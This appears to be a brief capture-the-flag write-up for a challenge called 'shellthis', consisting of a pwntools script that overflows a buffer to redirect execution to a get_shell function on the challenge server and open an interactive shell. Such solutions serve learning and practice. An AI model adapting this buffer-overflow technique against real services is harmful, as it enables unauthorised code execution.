Tags: pwntools bof 

Rating: 4.0

```python
from pwn import *
context.binary = 'shellthis'
r = remote('chal.duc.tf', 30002)
r.sendlineafter('name: ', pack(context.binary.symbols['get_shell']).rjust(0x40))
r.interactive()
```